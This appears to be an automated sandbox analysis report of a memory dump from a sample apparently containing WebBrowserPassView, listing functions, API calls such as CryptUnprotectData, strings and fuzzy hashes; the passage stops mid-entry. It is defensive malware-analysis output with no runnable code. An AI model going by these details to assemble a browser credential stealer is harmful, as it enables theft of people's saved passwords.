Instruction Fuzzy Hash: E8F0E03B600A157FD6103BF0BC4CF5B776CDBC6B96B01013AF905D6252DE68580487B9

Uniqueness

Uniqueness Score: -1.00%

Function 00406FCE, Relevance: 11.4, APIs: 9, Instructions: 106stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406FF4
memset.MSVCRT ref: 00407008
strcpy.MSVCRT(?,?,?,00407919,?,?,?,?,?,?,?,?,?), ref: 00407022
strcpy.MSVCRT(?,?,?,?,?,?,?,00407919,?,?,?,?,?,?,?,?), ref: 00407067
strcpy.MSVCRT(?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?,?,?), ref: 0040707B
strcpy.MSVCRT(?,?,?,00001000,?,?,?,?,?,?,?,00407919,?,?,?,?), ref: 0040708E
wcscpy.MSVCRT ref: 0040709D
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070C3
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,?,?,?,?,?,?,?,?,?,00407919), ref: 004070DD

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: strcpy$ByteCharMultiWidememset$wcscpy
String ID:
API String ID: 4248099071-0
Opcode ID: 221fa140badc488d7490084bdd8a123b4b2ae1bb81a73de0e3900b412043c0ad
Instruction ID: 3602a3695f0633691502e701aaeaa3678f077821d3d25540d64766a890a16dc7
Opcode Fuzzy Hash: 221fa140badc488d7490084bdd8a123b4b2ae1bb81a73de0e3900b412043c0ad
Instruction Fuzzy Hash: A6412D7590021DAFDB20DF64CC80FDAB3FCBB09344F0485AAB559D2141DA34AB448F64

Uniqueness

Uniqueness Score: -1.00%

Function 00404F3A, Relevance: 10.6, APIs: 7, Instructions: 125windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00404F51
SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00404F6A
SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00404F77
SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00404F83
memset.MSVCRT ref: 00404FE7
SendMessageW.USER32(?,0000105F,?,?), ref: 0040501C
SetFocus.USER32(?), ref: 004050A2

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessageSend$FocusItemmemset
String ID:
API String ID: 4281309102-0
Opcode ID: cabf6ed893144343294746ff1285555b4b015a401c90904a970732f73e5fe41f
Instruction ID: 4a7769bfe8dd657eebcefc70b29ecb6e887c437cb47c08b61b0609965a717ddb
Opcode Fuzzy Hash: cabf6ed893144343294746ff1285555b4b015a401c90904a970732f73e5fe41f
Instruction Fuzzy Hash: 7B415975900219BBDB20DF95CC89EAFBFB9EF04754F1040AAF508A6291D3749A90CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040D26F, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON

Download Yara Rule

APIs

wcscat.MSVCRT ref: 0040D33E
_snwprintf.MSVCRT ref: 0040D365

Strings

<tr>, xrefs: 0040D297
 , xrefs: 0040D338
<td bgcolor=#%s nowrap>%s, xrefs: 0040D27F
<td bgcolor=#%s>%s, xrefs: 0040D28D

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintfwcscat
String ID:  $<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
API String ID: 384018552-4153097237
Opcode ID: f46ff3c48073cbe96136da65081651e95d718f608025dc9e628f6efcf1769426
Instruction ID: 8f1261d6e50b9fc48a8d4c2a01cb2efc3c1dd918db621c17a7092c97f5fd87e6
Opcode Fuzzy Hash: f46ff3c48073cbe96136da65081651e95d718f608025dc9e628f6efcf1769426
Instruction Fuzzy Hash: 7E318D31900209EFDF04EF54CC86AAE7F75FF44320F1001AAE905AB2E2C738AA55DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040B974, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 0040B98A
memset.MSVCRT ref: 0040B9A9
GetMenuItemInfoW.USER32 ref: 0040B9E5
wcschr.MSVCRT ref: 0040B9FD

Strings

0, xrefs: 0040B9C4
6, xrefs: 0040B9CC

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ItemMenu$CountInfomemsetwcschr
String ID: 0$6
API String ID: 2029023288-3849865405
Opcode ID: 00042f4cecb0564cffffbf5123c116da2299592ae5eb2f27c9d7456f419c59bb
Instruction ID: 3c4375d2aaca836e1f5ba8730f1b4cbf28b1f601c5efe325adce4426e162c3cb
Opcode Fuzzy Hash: 00042f4cecb0564cffffbf5123c116da2299592ae5eb2f27c9d7456f419c59bb
Instruction Fuzzy Hash: 6A218B72605340ABD710DF55D845A9BB7E8FB89B54F00063FF644A2291E77ADA00CBDE

Uniqueness

Uniqueness Score: -1.00%

Function 004086FA, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00408716
GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 00408742
GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 00408757
wcscpy.MSVCRT ref: 00408767
wcscat.MSVCRT ref: 00408774
wcscat.MSVCRT ref: 00408783
wcscpy.MSVCRT ref: 00408795

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: faaca5197708b47c47af442705d4c9df3f3a62e632b81e41ea1eb2464032714f
Instruction ID: e89223cf66055297cb9dadcb336121efaa359588445afa49c1b13fad1ad85cab
Opcode Fuzzy Hash: faaca5197708b47c47af442705d4c9df3f3a62e632b81e41ea1eb2464032714f
Instruction Fuzzy Hash: 3D1160B280011CBBEF11AF94DD45EEB7BBCEB41744F10407BBA04A6091D6389E448B79

Uniqueness

Uniqueness Score: -1.00%

Function 0040D86C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D891
memset.MSVCRT ref: 0040D8A6
_snwprintf.MSVCRT ref: 0040D8F3

Strings

<%s>, xrefs: 0040D8E2
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040D8BF
<?xml version="1.0" ?>, xrefs: 0040D8B8

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: 6c1110d14c1add4ef8e68146380b3aae4225835160ec4e19b547157684646b60
Instruction ID: 334aba75e86a29cb8f13e765f22732fbee0fc66aecb0188c901082e5a368eb6e
Opcode Fuzzy Hash: 6c1110d14c1add4ef8e68146380b3aae4225835160ec4e19b547157684646b60
Instruction Fuzzy Hash: 6C01DFB2A402197BE710A759CC41FAA776DEF44744F1440B7B60CF3141D7389E458799

Uniqueness

Uniqueness Score: -1.00%

Function 00408806, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00408826
_snwprintf.MSVCRT ref: 0040884D
wcscat.MSVCRT ref: 0040885F
wcscat.MSVCRT ref: 0040887C
wcscat.MSVCRT ref: 0040888B

Strings

%2.2X, xrefs: 0040883C

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: 5a064a07adf84ed7b2831601ac1f3950ee49257a2339621e3ef87230185a7937
Instruction ID: 7e3155c1ee39ddc5e1c88fc61abef366a99ea1f709d40badb718d03975286e65
Opcode Fuzzy Hash: 5a064a07adf84ed7b2831601ac1f3950ee49257a2339621e3ef87230185a7937
Instruction Fuzzy Hash: 8F012873D4031866F734E7519C46BBA33A8AB81B18F11403FFC54B51C2EA7CDA4446D8

Uniqueness

Uniqueness Score: -1.00%

Function 00443C91, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 00443CA6
wcscat.MSVCRT ref: 00443CB5
wcscat.MSVCRT ref: 00443CC6
wcscat.MSVCRT ref: 00443CD5
VerQueryValueW.VERSION(?,?,00000000,?), ref: 00443CEF

Part of subcall function 0040807E: wcslen.MSVCRT ref: 00408085
Part of subcall function 0040807E: memcpy.MSVCRT ref: 0040809B

Part of subcall function 00408148: lstrcpyW.KERNEL32 ref: 0040815D
Part of subcall function 00408148: lstrlenW.KERNEL32(?), ref: 00408164

Strings

\StringFileInfo\, xrefs: 00443CA0

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 393120378-2245444037
Opcode ID: 9500244735cad2a77f643a6d996c161e8bec2251a1074d797bccc37d017a6394
Instruction ID: 4bcd922806ee50f9cb47b7d9b2cc513868d30f54de93413914084f8cb2eb3ca3
Opcode Fuzzy Hash: 9500244735cad2a77f643a6d996c161e8bec2251a1074d797bccc37d017a6394
Instruction Fuzzy Hash: B801847290020DA6EF11EAA1CC45EDF777CAB44308F1005B7B654F2052EA3CDB869B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B7A3, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 0040B7C8
wcscpy.MSVCRT ref: 0040B7EB

Strings

general, xrefs: 0040B7E1
dialog_%d, xrefs: 0040B7BC
menu_%d, xrefs: 0040B7AC
strings, xrefs: 0040B7D6

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: 167585e561b408c48eaedfed01294a32f4914c684c08b453e3d5971788cf8a7a
Instruction ID: fa5e8ebf88800a0e12fd117f624f479e56397311d80730f797776366f89ad5f2
Opcode Fuzzy Hash: 167585e561b408c48eaedfed01294a32f4914c684c08b453e3d5971788cf8a7a
Instruction Fuzzy Hash: 9FE086717C830031FE1115511E83F162150C6E5F95FB1046BF505B16D2DB7D8864668F

Uniqueness

Uniqueness Score: -1.00%

Function 0042A67D, Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0042A6FC

Strings

GROUP, xrefs: 0042A8B9
ORDER, xrefs: 0042A887
aggregate functions are not allowed in the GROUP BY clause, xrefs: 0042A93F
a GROUP BY clause is required before HAVING, xrefs: 0042A92B
8, xrefs: 0042A814

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset
String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
API String ID: 2221118986-1606337402
Opcode ID: 8c8ae128e2328f7302dbfa3f65ab71e8e651d3896b870492eb27771cacaf7654
Instruction ID: c7fea52ce07df1abaedfaf21b9d509cbcb108d5d19e9a81960d934b60e9c5d67
Opcode Fuzzy Hash: 8c8ae128e2328f7302dbfa3f65ab71e8e651d3896b870492eb27771cacaf7654
Instruction Fuzzy Hash: 6A818D70A083219FDB10DF15E48161BB7E0AF94324F59885FEC859B252D378EC95CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00413117, Relevance: 9.1, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004115CD,00000000,00000000), ref: 00413152
memset.MSVCRT ref: 004131B4
memset.MSVCRT ref: 004131C4

Part of subcall function 00413031: wcscpy.MSVCRT ref: 0041305A

memset.MSVCRT ref: 004132AF
wcscpy.MSVCRT ref: 004132D0
CloseHandle.KERNEL32(?,004115CD,?,?,?,004115CD,00000000,00000000), ref: 00413326

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID:
API String ID: 3300951397-0
Opcode ID: f89de95a6920a90433c065a9965a4fcf749ac6404f68e573733b6ce647e0e13f
Instruction ID: cefdbdf849389f09311ea621c5a87f262da3bfb792e558c61850347b92c9bf04
Opcode Fuzzy Hash: f89de95a6920a90433c065a9965a4fcf749ac6404f68e573733b6ce647e0e13f
Instruction Fuzzy Hash: 0D514971108344AFD720DF65CC88A9BB7E8FB84306F404A2EF99982251DB74DA44CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00417EE5, Relevance: 9.1, APIs: 6, Instructions: 78COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00417F17
GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 00417F25
free.MSVCRT(00000000), ref: 00417F6B

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFilefreememset
String ID:
API String ID: 2507021081-0
Opcode ID: 589a6b9333c77986f3b6355c6ce351534fc2f1959dd785c0c1c88223f13a717d
Instruction ID: b8dc40b53dc963fdbe0ae3b1e60dcad109612476599bdcfb1117a2ceff08efc0
Opcode Fuzzy Hash: 589a6b9333c77986f3b6355c6ce351534fc2f1959dd785c0c1c88223f13a717d
Instruction Fuzzy Hash: 0811B73690C1159B9B109F649CC15EF7278DB49354B21013BF912A2281D63C9D82D2AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF2B, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 78COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040EF4D

Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B340
Part of subcall function 0040B301: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040B3D9
Part of subcall function 0040B301: memcpy.MSVCRT ref: 0040B419

Part of subcall function 0040B301: wcscpy.MSVCRT ref: 0040B382
Part of subcall function 0040B301: wcslen.MSVCRT ref: 0040B3A0
Part of subcall function 0040B301: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040C3FA,?,0040FE90,00000000,00000000,?), ref: 0040B3AE

Part of subcall function 00408AE8: memset.MSVCRT ref: 00408B09
Part of subcall function 00408AE8: _snwprintf.MSVCRT ref: 00408B3C
Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B48
Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B60
Part of subcall function 00408AE8: wcslen.MSVCRT ref: 00408B6E
Part of subcall function 00408AE8: memcpy.MSVCRT ref: 00408B81

Part of subcall function 00408907: GetSaveFileNameW.COMDLG32(?), ref: 00408956
Part of subcall function 00408907: wcscpy.MSVCRT ref: 0040896D

Strings

*.txt, xrefs: 0040EF6F
txt, xrefs: 0040EF52
*.csv, xrefs: 0040EF9E
*.xml, xrefs: 0040EFDA
*.htm;*.html, xrefs: 0040EFB3

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameSaveString_snwprintf
String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
API String ID: 1392923015-3614832568
Opcode ID: e098a2b6de55531eea522cb88dcf061458ab68b85293c38f111b81194adb8019
Instruction ID: 893d8713e26b77edc4206c052df4fc7d3163be0104e9675467069f1f0f0c5c5e
Opcode Fuzzy Hash: e098a2b6de55531eea522cb88dcf061458ab68b85293c38f111b81194adb8019
Instruction Fuzzy Hash: 963150B1D006199FDB10EF96D8856DD7BB4FF04318F20417BF908B7281EB786A458B98

Uniqueness

Uniqueness Score: -1.00%

Function 00416E10, Relevance: 9.1, APIs: 6, Instructions: 61COMMON

Download Yara Rule

APIs

AreFileApisANSI.KERNEL32 ref: 00416E17
MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00416E35
malloc.MSVCRT ref: 00416E3F
MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 00416E56
free.MSVCRT(?), ref: 00416E5F
free.MSVCRT(?,?), ref: 00416E7D

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWidefree$ApisFilemalloc
String ID:
API String ID: 4131324427-0
Opcode ID: ef1d8c4a491119e611ed89199fe48a787826ffdbe5a65be19b588c9cf178c72a
Instruction ID: 8f18c9831eb1c79f14fd8e789aed1b74bdecd3d50ffb4352c5f07f5f59d31971
Opcode Fuzzy Hash: ef1d8c4a491119e611ed89199fe48a787826ffdbe5a65be19b588c9cf178c72a
Instruction Fuzzy Hash: 4901FC7A504221BBAB215B75EC01EEF36DCDF457B07220326FC14E7290DA28DD4145EC

Uniqueness

Uniqueness Score: -1.00%

Function 00414CCE, Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 21COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00414CF3
memcpy.MSVCRT ref: 00414D03

Strings

NA, xrefs: 00414CFE
MMA, xrefs: 00414CEE, 00414D14
LMA, xrefs: 00414CFD
MMA, xrefs: 00414CDF, 00414CED

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcpy
String ID: NA$LMA$MMA$MMA
API String ID: 3510742995-965156261
Opcode ID: 55ac8c502bd4826d858cd5ef6fc5d691ccd3d3d57d4c1cb0b8c1e43a78ebe62b
Instruction ID: 8582fd1753a63c193c8d59700b7b4d4e45a0e47666d49b47a36a18adf3e061cc
Opcode Fuzzy Hash: 55ac8c502bd4826d858cd5ef6fc5d691ccd3d3d57d4c1cb0b8c1e43a78ebe62b
Instruction Fuzzy Hash: DBE09A30940350DAE360A744DC82F823294A742B26F11843BE508229E3C3FC98C88BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00417AB2, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(000000E6,?,?,0041767E), ref: 00417AF6
GetTempPathA.KERNEL32(000000E6,?,?,0041767E), ref: 00417B1E
free.MSVCRT(00000000,0044C838,00000000), ref: 00417B46

Strings

etilqs_, xrefs: 00417B4E
%s\etilqs_, xrefs: 00417B9D

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PathTemp$free
String ID: %s\etilqs_$etilqs_
API String ID: 924794160-1420421710
Opcode ID: ef23db0a414d9dcf011a3825053a170985a18b01ba0b77813df6364c9434a8ca
Instruction ID: 98cb418060ea171a52ad1c8f6cb6bf58db0dc7ae7347cd78cc57f1029aea62d9
Opcode Fuzzy Hash: ef23db0a414d9dcf011a3825053a170985a18b01ba0b77813df6364c9434a8ca
Instruction Fuzzy Hash: F8314B3160C2595AE730A7659C41BFB73AD9F6434CF2404AFE481C2182EF6CEEC58A5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D5DA, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040D611

Part of subcall function 004147A8: memcpy.MSVCRT ref: 00414825

Part of subcall function 0040CDFA: wcscpy.MSVCRT ref: 0040CDFF
Part of subcall function 0040CDFA: _wcslwr.MSVCRT ref: 0040CE3A

_snwprintf.MSVCRT ref: 0040D65B

Strings

</item>, xrefs: 0040D677
<item>, xrefs: 0040D5E4
<%s>%s</%s>, xrefs: 0040D64E

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: bd6149e99cc7a28de9a93ba740ac90c598832ca3e2003f992b14148a88f33169
Instruction ID: be7e472b8ae12577d0ef69e4d5a2bd87498dbd4f23eec6cc8c98af6d964d1ad5
Opcode Fuzzy Hash: bd6149e99cc7a28de9a93ba740ac90c598832ca3e2003f992b14148a88f33169
Instruction Fuzzy Hash: 3E11C13160031ABBEB11AB65CCC6E997B25FF08708F100026F809676A2C739F961DBC9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F2F9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040F329

Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D

wcsrchr.MSVCRT ref: 0040F343
wcscat.MSVCRT ref: 0040F35F

Strings

General, xrefs: 0040F369
.cfg, xrefs: 0040F359

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileModuleNamememsetwcscatwcsrchr
String ID: .cfg$General
API String ID: 776488737-1188829934
Opcode ID: 3c04ec66949ca4b58d7f719b2f0ee793d98d67a51e79d319996db7eeb5c734b3
Instruction ID: 56bea33938f28168157b0b8bcc93b38caa6b0521648f49714e8bc2d05d89a73e
Opcode Fuzzy Hash: 3c04ec66949ca4b58d7f719b2f0ee793d98d67a51e79d319996db7eeb5c734b3
Instruction Fuzzy Hash: 831186769013289ADF20EF55CC85ACE7378FF48754F1041FBE508A7142DB789A858B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040FBD2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45registryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 0040FBF3
RegisterClassW.USER32 ref: 0040FC18
GetModuleHandleW.KERNEL32(00000000), ref: 0040FC1F
CreateWindowExW.USER32 ref: 0040FC3E

Strings

WebBrowserPassView, xrefs: 0040FC36, 0040FC3B, 0040FC3C

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: HandleModule$ClassCreateRegisterWindow
String ID: WebBrowserPassView
API String ID: 2678498856-2171583229
Opcode ID: 83b8f8d6c3154c4bdd4fc1cc3252cc631093d3cfb7f7179f48de14d9357ef2dd
Instruction ID: f352fd5291e0f9f707763c8e0c0f79a6b8b327092a808c719acfd4fe52221a97
Opcode Fuzzy Hash: 83b8f8d6c3154c4bdd4fc1cc3252cc631093d3cfb7f7179f48de14d9357ef2dd
Instruction Fuzzy Hash: 6E01C4B1D02629ABDB01DF998C89ADFBEBCFF09750F108116F514E6241D7B45A408BE9

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB9, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
FreeLibrary.KERNEL32(00000000), ref: 00403BFD

Strings

CryptUnprotectData, xrefs: 00403BD4
crypt32.dll, xrefs: 00403BC3

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptUnprotectData$crypt32.dll
API String ID: 145871493-1827663648
Opcode ID: 5a4a0124d32878fe9075046ef856c222503c42c3ca474c9d5839c12a83985592
Instruction ID: 6d08c6472c4a7eef0e99d7de69836aa1542f25023555ecd08c966f49be56efdf
Opcode Fuzzy Hash: 5a4a0124d32878fe9075046ef856c222503c42c3ca474c9d5839c12a83985592
Instruction Fuzzy Hash: B3012C36508A419BDB318F168D4881BFEF9EFE1741B25482EE0C6E2261D7799980CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041409A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 004140A9
wcscpy.MSVCRT ref: 004140C4
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000,0040F398,00000000,?,0040F398,?,General,?), ref: 004140EB
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000001), ref: 004140F2

Strings

General, xrefs: 004140BE

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcscpy$CloseCreateFileHandle
String ID: General
API String ID: 999786162-26480598
Opcode ID: b82796398bdfff255fd1f18aa51d55e941ea69e93fc42597b2932e96296840f9
Instruction ID: 886da17c1b1bf2e9de85dc8b7e1e57be2bc6bdc909f117fec59c49a827307fb5
Opcode Fuzzy Hash: b82796398bdfff255fd1f18aa51d55e941ea69e93fc42597b2932e96296840f9
Instruction Fuzzy Hash: 6BF059B3408701AFF7209B919C85E9B7BDCEB98318F11842FF21991011DB384C4486A9

Uniqueness

Uniqueness Score: -1.00%

Function 00407DF4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,0040DEA5,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 00407E08
_snwprintf.MSVCRT ref: 00407E35
MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00407E4E

Strings

Error %d: %s, xrefs: 00407E24
Error, xrefs: 00407E3F

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: a75c3089e7e966da0bd638cb6b9ab9d800269499d53a23e07f81a9ce3fd34d46
Instruction ID: b00963ac5392a62de3320d989648915026267cceceb2d36b0a398715d1e41bd5
Opcode Fuzzy Hash: a75c3089e7e966da0bd638cb6b9ab9d800269499d53a23e07f81a9ce3fd34d46
Instruction Fuzzy Hash: B9F0A77694060867EF11A794CC06FDA73ACBB84791F1400BBF945E2181DAB8EA854A69

Uniqueness

Uniqueness Score: -1.00%

Function 0041473D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(shlwapi.dll,770B48C0,?,00404C4C,00000000), ref: 00414746
GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00414754
FreeLibrary.KERNEL32(00000000,?,00404C4C,00000000), ref: 0041476C

Strings

shlwapi.dll, xrefs: 0041473F
SHAutoComplete, xrefs: 0041474E

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SHAutoComplete$shlwapi.dll
API String ID: 145871493-1506664499
Opcode ID: 86042acc96e33f1a31b74afa18de2a5d13a01f1e05fbb0343d8f5c10d07cce3a
Instruction ID: 374e307410260eae357c848a0ac8b8d2ed108e4990ae0ebeecf0dac054c84ad8
Opcode Fuzzy Hash: 86042acc96e33f1a31b74afa18de2a5d13a01f1e05fbb0343d8f5c10d07cce3a
Instruction Fuzzy Hash: B1D05B397005206BEA5167366C48FEF3A55EFC7B517154031F910D2261DB648C0285AD

Uniqueness

Uniqueness Score: -1.00%

Function 004351F7, Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 390COMMON

Download Yara Rule

Strings

foreign key constraint failed, xrefs: 00435497
oid, xrefs: 004352C1
new, xrefs: 00435285
old, xrefs: 0043527B

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: foreign key constraint failed$new$oid$old
API String ID: 0-1953309616
Opcode ID: e023502b744750f4b23ffe04e2ae5b216edfebde367b4abfa2077d4614065f4c
Instruction ID: aa3871157cb2c29edb2d7db9a5a62b5d9e1ddd85e1ada7e098d24c65e5f6a169
Opcode Fuzzy Hash: e023502b744750f4b23ffe04e2ae5b216edfebde367b4abfa2077d4614065f4c
Instruction Fuzzy Hash: 60E1BF71E00209EFDB14DFA5D981AAEBBB5FF48304F10806AE805AB341DB78AD51CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00430EBE, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00430FBE
memcpy.MSVCRT ref: 004310D5

Strings

